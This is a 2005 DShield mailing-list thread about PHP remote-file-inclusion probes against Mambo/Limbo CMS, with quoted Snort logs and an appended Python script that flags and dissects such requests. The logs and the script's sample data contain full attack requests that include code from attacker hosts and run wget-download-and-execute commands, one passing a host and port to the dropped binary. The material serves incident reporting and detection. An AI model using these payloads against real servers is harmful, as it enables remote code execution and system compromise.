[Dshield] PHP injection attacks

Meidinger Chris chris.meidinger at badenIT.de
Thu Dec 22 09:58:32 GMT 2005


Hi,

This is the same thing David just asked about.

It looks like you're right, that it's not mambo but limbo CMS. Apparently they both use similar code or libraries.

I can't imagine your VPN gateway being susceptible to the attacks, with or without patches. They seem to be for Limbo running on Apache running on *nix. That is very unlikely to be a part of your VPN setup.

What does a packet dump show you? Is your box sending out 404s?

Cheers,

Chris

-----Original Message-----
From: list-bounces at lists.dshield.org on behalf of tfischer at oldenburggroup.com
Sent: Thu 22-Dec-05 04:25
To: list at lists.dshield.org
Subject: [Dshield] PHP injection attacks
 

I have started to see exploit attempts against my VPN. I believe I have identified them as: FrSIRT advisory 12/15/05 - ADV-2005-2932, CVE-2005-4317, CVE-2005-4318, CVE-2005-4319, CVE-2005-4320.

I called my VPN vendor to see if they were susceptible to this type of attack. They said that as long as I had the latest patches I should be fine. I asked them why the device does not log the attempts. They said they didn't know, but there was no need to worry as long as the patches were in. The attacks are only being directed at this box. They come in sets of 5 or 6. There was one set Monday night, 6 yesterday and 50 so far today. Does anyone know if this pattern has been automated and I'm just seeing some bots out there searching? Anyone else seeing this?

Here are some of the SNORT logs:

GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
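
Added example, not part of the thread and not code from Mambo or Limbo: a small Python triage script for request lines like the Snort captures above. It decodes each request target, flags the ones where mosConfig_absolute_path is set to a remote URL (the remote-include value the probe relies on), notes the GLOBALS= / _REQUEST[...] tampering that rides along with it, and pulls out the shell commands and download locations the payload would run. The two attack requests are transcribed from the captures quoted above with the line wraps removed; the "benign" and "localpath" requests, the list of downloader commands and the URL-scheme check are my own assumptions for illustration.

```python
"""Triage Mambo/Limbo remote-file-inclusion probes from captured request targets."""
import re
from dataclasses import dataclass, field
from urllib.parse import unquote, urlsplit

# "listen" and "sexy" are transcribed from the Snort captures in the thread (wraps removed).
# "benign" and "localpath" are constructed here for contrast and are not from the captures.
CAPTURED_REQUESTS = {
    "listen": "/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content"
              "&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?"
              "&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|",
    "sexy": "/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS="
            "&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?"
            "&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;"
            "./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|",
    "benign": "/index.php?option=com_content&do_pdf=1&id=1",              # constructed
    "localpath": "/index2.php?mosConfig_absolute_path=/var/www/mambo",    # constructed
}

# Assumptions: a remote include needs a URL scheme; these are the fetchers worth extracting.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
DOWNLOADERS = {"wget", "curl", "fetch", "lynx"}


@dataclass
class Finding:
    include_url: str                  # value the probe wants prepended to the include path
    include_host: str                 # where the remote PHP would be fetched from
    commands: list = field(default_factory=list)        # shell the remote script would run
    download_urls: list = field(default_factory=list)   # second-stage payloads it pulls
    tampered_globals: bool = False    # GLOBALS= / _REQUEST[...] present (register_globals abuse)


def split_params(target: str) -> dict:
    """Decode a request target into key/value pairs.

    Splits on the first '?' only and on '&' afterwards, so the stacked
    'index.php?...&id=1index2.php?_REQUEST[...]' shape in the captures
    still yields the mosConfig_absolute_path and cmd values intact.
    """
    _, _, query = target.partition("?")
    params = {}
    for piece in query.split("&"):
        if not piece:
            continue
        key, _, value = piece.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def classify(target: str):
    """Return a Finding for a remote-include attempt, or None for anything else."""
    params = split_params(target)
    include = params.get("mosConfig_absolute_path", "")
    if not REMOTE_SCHEME.match(include):
        return None  # parameter absent, or a local path: not a remote include
    finding = Finding(include_url=include, include_host=urlsplit(include).hostname or "")
    finding.tampered_globals = any(k == "GLOBALS" or k.startswith("_REQUEST[") for k in params)
    # Split the cmd value on ';' the same way the payload author chained it.
    finding.commands = [c.strip() for c in params.get("cmd", "").split(";") if c.strip()]
    for cmd in finding.commands:
        words = cmd.split()
        if len(words) > 1 and words[0] in DOWNLOADERS:
            finding.download_urls.append(words[1])
    return finding


def triage(requests: dict) -> dict:
    """Classify every request target; None marks the ones that are not RFI probes."""
    return {name: classify(target) for name, target in requests.items()}


if __name__ == "__main__":
    for name, finding in triage(CAPTURED_REQUESTS).items():
        if finding is None:
            print(f"{name}: no remote include")
        else:
            print(f"{name}: include from {finding.include_host}, fetches {finding.download_urls}, "
                  f"runs {finding.commands}")
```

The download URLs and the arguments passed to the dropped binary are what to look for in the packet dump Chris asks about: a host that is not running the PHP front end should answer these requests with 404s and show no outbound connection to any of those addresses.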


